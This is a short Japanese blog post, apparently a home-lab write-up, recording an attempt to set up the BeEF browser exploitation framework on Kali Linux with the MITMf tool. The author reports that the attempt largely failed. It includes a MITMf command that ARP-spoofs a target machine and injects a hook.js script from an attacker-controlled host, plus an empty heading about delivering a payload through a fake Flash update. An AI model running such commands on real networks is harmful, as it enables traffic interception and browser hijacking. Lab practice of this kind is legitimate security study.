はじめに
「ハッキング・ラボのつくりかた」p.498-507を参考にして、KaliLinux2022.1で検証した記事となります。始めに行っておきますが、MITMfの不具合の影響で、ほぼ何も出来ていません。
beefは、ブラウザに焦点を当てたペネトレーションツール。
注意事項
記事で紹介されている行為を他人や団体、インフラなどの許可を得ずに行った場合、犯罪となる可能性が有ります。
あくまでも、記事の内容は情報セキュリティの学習です。読者様の所有・管理の機器、システムでのみ実行してください。
また、読者さまのシステムにトラブルが起きたとしても、私は責任を負いかねます。
beefのインストールと起動
KaliLinux2022.1には、デフォルトでインストールされていないので、インストール。
インストール
sudo apt install beef-xss
初回設定(パスワードの変更)
sudo beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
このような出力があったら、新規のパスワードを設定する。ここでは、aaa111とした。
Firefoxを起動して、"http://127.0.0.1:3000/ui/panel"
にアクセスする。
beefのjavascriptを実行させる
python mitmf.py -i eth2 --arp --spoof --gateway 192.168.1.1 --target 192.168.1.17 --inject --js-url http://192.168.1.100:3000/hook.js
実行させてみたが、ターゲットのブラウザがインターネットに繋がらなくなっているので、失敗した。
攻撃(音を鳴らす)
前項のjavascriptの実行が失敗しているので、これは出来なかった。
偽のAdobe Flashのアップデートによりペイロードをダウンロードさせる
偽ページの設置
おわりに
結局、MITMfがうまく動作できていないので、BeEFの動作もうまく行かない。
MITMfの代わりとなるものがあればよいのだが・・・。
参考にしたもの
「ハッキング・ラボのつくりかた」